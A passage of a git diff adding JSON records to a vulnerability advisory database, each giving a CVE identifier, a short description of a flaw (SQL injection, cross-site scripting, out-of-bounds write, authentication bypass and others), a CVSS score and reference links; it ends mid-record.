a/advisories/unreviewed/2024/02/GHSA-375g-qj2r-88m9/GHSA-375g-qj2r-88m9.json b/advisories/unreviewed/2024/02/GHSA-375g-qj2r-88m9/GHSA-375g-qj2r-88m9.json new file mode 100644 index 0000000000000..1b2ce77baddb9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-375g-qj2r-88m9/GHSA-375g-qj2r-88m9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-375g-qj2r-88m9", + "modified": "2024-02-02T09:30:20Z", + "published": "2024-02-02T09:30:20Z", + "aliases": [ + "CVE-2023-45734" + ], + "details": "\nin OpenHarmony v3.2.4 and prior versions allow an adjacent attacker arbitrary code execution through out-of-bounds write.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45734" + }, + { + "type": "WEB", + "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-37j2-h4x2-rp3v/GHSA-37j2-h4x2-rp3v.json b/advisories/unreviewed/2024/02/GHSA-37j2-h4x2-rp3v/GHSA-37j2-h4x2-rp3v.json new file mode 100644 index 0000000000000..85a3fc44b8162 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-37j2-h4x2-rp3v/GHSA-37j2-h4x2-rp3v.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-37j2-h4x2-rp3v", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2023-40545" + ], + "details": "Authentication bypass when an OAuth2 Client is using client_secret_jwt as its authentication method on affected 11.3 versions via specially crafted requests.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40545" + }, + { + "type": "WEB", + "url": "https://docs.pingidentity.com/r/en-us/pingfederate-113/hro1701116403236" + }, + { + "type": "WEB", + "url": "https://support.pingidentity.com/s/article/SECADV040-PingFederate-OAuth-Client-Authentication-Bypass" + }, + { + "type": "WEB", + "url": "https://www.pingidentity.com/en/resources/downloads/pingfederate/previous-releases.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T18:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-37r9-v4pm-3344/GHSA-37r9-v4pm-3344.json b/advisories/unreviewed/2024/02/GHSA-37r9-v4pm-3344/GHSA-37r9-v4pm-3344.json new file mode 100644 index 0000000000000..eaacfceba91f0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-37r9-v4pm-3344/GHSA-37r9-v4pm-3344.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-37r9-v4pm-3344", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0954" + ], + "details": "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting through editing context via the 'data-eael-wrapper-link' wrapper in all versions up to, and including, 5.9.7 due to insufficient input sanitization and output escaping on user supplied protocols. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0954" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3029928/essential-addons-for-elementor-lite/tags/5.9.8/assets/front-end/js/view/wrapper-link.js" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-382c-wf23-2vph/GHSA-382c-wf23-2vph.json b/advisories/unreviewed/2024/02/GHSA-382c-wf23-2vph/GHSA-382c-wf23-2vph.json new file mode 100644 index 0000000000000..16076e9dfe15d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-382c-wf23-2vph/GHSA-382c-wf23-2vph.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-382c-wf23-2vph", + "modified": "2024-02-08T21:30:34Z", + "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2024-24388" + ], + "details": "Cross-site scripting (XSS) vulnerability in XunRuiCMS versions v4.6.2 and before, allows remote attackers to obtain sensitive information via crafted malicious requests to the background login.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24388" + }, + { + "type": "WEB", + "url": "https://www.cnblogs.com/rxtycc/p/17948379" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3938-2cj5-r45m/GHSA-3938-2cj5-r45m.json b/advisories/unreviewed/2024/02/GHSA-3938-2cj5-r45m/GHSA-3938-2cj5-r45m.json new file mode 100644 index 0000000000000..766ee760a878e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3938-2cj5-r45m/GHSA-3938-2cj5-r45m.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3938-2cj5-r45m", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-22779" + ], + "details": "Directory Traversal vulnerability in Kihron ServerRPExposer v.1.0.2 and before allows a remote attacker to execute arbitrary code via the loadServerPack in ServerResourcePackProviderMixin.java.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22779" + }, + { + "type": "WEB", + "url": "https://github.com/Kihron/ServerRPExposer/commit/8f7b829df633f59e828d677f736c53652d6f1b8f" + }, + { + "type": "WEB", + "url": "https://gist.github.com/apple502j/193358682885fe1a6708309ce934e4ed" + }, + { + "type": "WEB", + "url": "https://modrinth.com/mod/serverrpexposer" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-39f6-9c52-27p8/GHSA-39f6-9c52-27p8.json b/advisories/unreviewed/2024/02/GHSA-39f6-9c52-27p8/GHSA-39f6-9c52-27p8.json new file mode 100644 index 0000000000000..cc81f5d110af6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-39f6-9c52-27p8/GHSA-39f6-9c52-27p8.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39f6-9c52-27p8", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2023-31002" + ], + "details": "IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 temporarily stores sensitive information in files that could be accessed by a local user. IBM X-Force ID: 254657.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31002" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254657" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3c3r-6mf2-xcmp/GHSA-3c3r-6mf2-xcmp.json b/advisories/unreviewed/2024/02/GHSA-3c3r-6mf2-xcmp/GHSA-3c3r-6mf2-xcmp.json new file mode 100644 index 0000000000000..bcd3831a5a6c3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3c3r-6mf2-xcmp/GHSA-3c3r-6mf2-xcmp.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3c3r-6mf2-xcmp", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2024-24013" + ], + "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /novel/pay/list", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24013" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24013.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3c4g-j683-8mx6/GHSA-3c4g-j683-8mx6.json b/advisories/unreviewed/2024/02/GHSA-3c4g-j683-8mx6/GHSA-3c4g-j683-8mx6.json new file mode 100644 index 0000000000000..7f49e787b2f38 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3c4g-j683-8mx6/GHSA-3c4g-j683-8mx6.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3c4g-j683-8mx6", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-1072" + ], + "details": "The Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the seedprod_lite_new_lpage function in all versions up to, and including, 6.15.21. This makes it possible for unauthenticated attackers to change the contents of coming-soon, maintenance pages, login and 404 pages set up with the plugin. Version 6.15.22 addresses this issue but introduces a bug affecting admin pages. We suggest upgrading to 6.15.23.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1072" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3029567/coming-soon/trunk/app/lpage.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/78d7920b-3e20-43c7-a522-72bac824c2cb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3f42-7384-7vpr/GHSA-3f42-7384-7vpr.json b/advisories/unreviewed/2024/02/GHSA-3f42-7384-7vpr/GHSA-3f42-7384-7vpr.json new file mode 100644 index 0000000000000..6341cf598f800 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3f42-7384-7vpr/GHSA-3f42-7384-7vpr.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3f42-7384-7vpr", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-48793" + ], + "details": "Zoho ManageEngine ADAudit Plus through 7250 allows SQL Injection in the aggregate report feature.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48793" + }, + { + "type": "WEB", + "url": "https://manageengine.com" + }, + { + "type": "WEB", + "url": "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3gg6-vc2p-3m85/GHSA-3gg6-vc2p-3m85.json b/advisories/unreviewed/2024/02/GHSA-3gg6-vc2p-3m85/GHSA-3gg6-vc2p-3m85.json new file mode 100644 index 0000000000000..2f013a0ecc060 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3gg6-vc2p-3m85/GHSA-3gg6-vc2p-3m85.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3gg6-vc2p-3m85", + "modified": "2024-02-08T12:30:48Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2024-24880" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apollo13Themes Apollo13 Framework Extensions allows Stored XSS.This issue affects Apollo13 Framework Extensions: from n/a through 1.9.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24880" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/apollo13-framework-extensions/wordpress-apollo13-framework-extensions-plugin-1-9-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T12:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3gjv-wq7v-458m/GHSA-3gjv-wq7v-458m.json b/advisories/unreviewed/2024/02/GHSA-3gjv-wq7v-458m/GHSA-3gjv-wq7v-458m.json new file mode 100644 index 0000000000000..f380d5aa55bf5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3gjv-wq7v-458m/GHSA-3gjv-wq7v-458m.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3gjv-wq7v-458m", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2024-22331" + ], + "details": "IBM UrbanCode Deploy (UCD) 7.0 through 7.0.5.19, 7.1 through 7.1.2.15, 7.2 through 7.2.3.8, 7.3 through 7.3.2.3, and IBM UrbanCode Deploy (UCD) - IBM DevOps Deploy 8.0.0.0 could disclose sensitive user information when installing the Windows agent. IBM X-Force ID: 279971.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22331" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/279971" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7114131" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3j3m-xc65-2xvg/GHSA-3j3m-xc65-2xvg.json b/advisories/unreviewed/2024/02/GHSA-3j3m-xc65-2xvg/GHSA-3j3m-xc65-2xvg.json new file mode 100644 index 0000000000000..cfb212801456d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3j3m-xc65-2xvg/GHSA-3j3m-xc65-2xvg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3j3m-xc65-2xvg", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0969" + ], + "details": "The ARMember plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's \"Default Restriction\" feature and view restricted post content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0969" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3030044/armember-membership/trunk/core/classes/class.arm_restriction.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3jx4-3grj-xm5w/GHSA-3jx4-3grj-xm5w.json b/advisories/unreviewed/2024/02/GHSA-3jx4-3grj-xm5w/GHSA-3jx4-3grj-xm5w.json new file mode 100644 index 0000000000000..acb8821c3b32e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3jx4-3grj-xm5w/GHSA-3jx4-3grj-xm5w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jx4-3grj-xm5w", + "modified": "2024-02-07T15:30:47Z", + "published": "2024-02-07T03:30:32Z", + "aliases": [ + "CVE-2024-22021" + ], + "details": "Vulnerability CVE-2024-22021 allows a Veeam Recovery Orchestrator user with a low privileged role (Plan Author) to retrieve plans from a Scope other than the one they are assigned to. \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22021" + }, + { + "type": "WEB", + "url": "https://veeam.com/kb4541" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3mj6-hq84-85g9/GHSA-3mj6-hq84-85g9.json b/advisories/unreviewed/2024/02/GHSA-3mj6-hq84-85g9/GHSA-3mj6-hq84-85g9.json new file mode 100644 index 0000000000000..6b5d04124de0f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3mj6-hq84-85g9/GHSA-3mj6-hq84-85g9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mj6-hq84-85g9", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33076" + ], + "details": "Memory corruption in Core when updating rollback version for TA and OTA feature is enabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33076" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3mpj-wgvw-fw9v/GHSA-3mpj-wgvw-fw9v.json b/advisories/unreviewed/2024/02/GHSA-3mpj-wgvw-fw9v/GHSA-3mpj-wgvw-fw9v.json new file mode 100644 index 0000000000000..9941cd576ad4c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3mpj-wgvw-fw9v/GHSA-3mpj-wgvw-fw9v.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mpj-wgvw-fw9v", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-24303" + ], + "details": "SQL Injection vulnerability in HiPresta \"Gift Wrapping Pro\" (hiadvancedgiftwrapping) module for PrestaShop before version 1.4.1, allows remote attackers to escalate privileges and obtain sensitive information via the HiAdvancedGiftWrappingGiftWrappingModuleFrontController::addGiftWrappingCartValue() method.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24303" + }, + { + "type": "WEB", + "url": "https://security.friendsofpresta.org/modules/2024/02/06/hiadvancedgiftwrapping.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T09:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3mwh-2gfv-6wv5/GHSA-3mwh-2gfv-6wv5.json b/advisories/unreviewed/2024/02/GHSA-3mwh-2gfv-6wv5/GHSA-3mwh-2gfv-6wv5.json new file mode 100644 index 0000000000000..b9946acdd5bff --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3mwh-2gfv-6wv5/GHSA-3mwh-2gfv-6wv5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mwh-2gfv-6wv5", + "modified": "2024-02-02T09:30:22Z", + "published": "2024-02-02T09:30:22Z", + "aliases": [ + "CVE-2024-21851" + ], + "details": "\nin OpenHarmony v4.0.0 and prior versions allow a local attacker cause heap overflow through integer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21851" + }, + { + "type": "WEB", + "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3mxj-h7pr-364q/GHSA-3mxj-h7pr-364q.json b/advisories/unreviewed/2024/02/GHSA-3mxj-h7pr-364q/GHSA-3mxj-h7pr-364q.json new file mode 100644 index 0000000000000..5d0e2c391aa0d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3mxj-h7pr-364q/GHSA-3mxj-h7pr-364q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mxj-h7pr-364q", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-42765" + ], + "details": "\n\n\n\n\n\n\n\n\nAn attacker with access to the vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the \"username\" parameter in the SNMP configuration.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42765" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3p6h-jm8p-g7p5/GHSA-3p6h-jm8p-g7p5.json b/advisories/unreviewed/2024/02/GHSA-3p6h-jm8p-g7p5/GHSA-3p6h-jm8p-g7p5.json new file mode 100644 index 0000000000000..458b73501a5cb --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3p6h-jm8p-g7p5/GHSA-3p6h-jm8p-g7p5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3p6h-jm8p-g7p5", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T00:31:28Z", + "aliases": [ + "CVE-2024-21866" + ], + "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the affected product responds back with an error message containing sensitive data if it receives a specific malformed request.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21866" + }, + { + "type": "WEB", + "url": "https://rapidscada.org/contact/" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-209" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T00:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3pj6-pjjw-252j/GHSA-3pj6-pjjw-252j.json b/advisories/unreviewed/2024/02/GHSA-3pj6-pjjw-252j/GHSA-3pj6-pjjw-252j.json new file mode 100644 index 0000000000000..8b66bb0bdaed0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3pj6-pjjw-252j/GHSA-3pj6-pjjw-252j.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3pj6-pjjw-252j", + "modified": "2024-02-08T09:30:39Z", + "published": "2024-02-08T09:30:39Z", + "aliases": [ + "CVE-2024-1207" + ], + "details": "The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1207" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032596%40booking&new=3032596%40booking&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7802ed1f-138c-4a3d-916c-80fb4f7699b2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T09:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3pwh-6jh8-p592/GHSA-3pwh-6jh8-p592.json b/advisories/unreviewed/2024/02/GHSA-3pwh-6jh8-p592/GHSA-3pwh-6jh8-p592.json new file mode 100644 index 0000000000000..e340748f4c1fa --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3pwh-6jh8-p592/GHSA-3pwh-6jh8-p592.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3pwh-6jh8-p592", + "modified": "2024-02-05T12:30:20Z", + "published": "2024-02-05T12:30:20Z", + "aliases": [ + "CVE-2023-5643" + ], + "details": "Out-of-bounds Write vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations. Depending on the configuration of the Mali GPU Kernel Driver, and if the system’s memory is carefully prepared by the user, then this in turn could write to memory outside of buffer bounds.This issue affects Bifrost GPU Kernel Driver: from r41p0 through r45p0; Valhall GPU Kernel Driver: from r41p0 through r45p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 